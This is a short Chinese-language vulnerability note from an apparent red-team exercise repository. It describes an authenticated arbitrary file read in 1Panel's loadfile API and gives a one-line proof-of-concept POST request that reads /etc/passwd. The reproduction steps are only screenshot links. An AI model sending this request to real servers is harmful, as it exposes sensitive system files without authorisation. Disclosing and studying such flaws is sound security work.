admin/2023Hvv
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
2023Hvv/1Panel loadfile 后台文件读取漏洞.md
ibaiw 55a3531280 add
2023-08-15 14:36:32 +08:00

538 B
Raw Blame History

漏洞描述

1Panel后台存在任意文件读取漏洞攻击者通过漏洞可以获取服务器中的敏感信息文件

POC

POST /api/v1/file/loadfile {"paht":"/etc/passwd"}

漏洞复现

登陆页面

![image-20230815142616338](./1Panel loadfile 后台文件读取漏洞.assets/image-20230815142616338.png)

![image-20230815142623048](./1Panel loadfile 后台文件读取漏洞.assets/image-20230815142623048.png)

![image-20230815142629323](./1Panel loadfile 后台文件读取漏洞.assets/image-20230815142629323.png)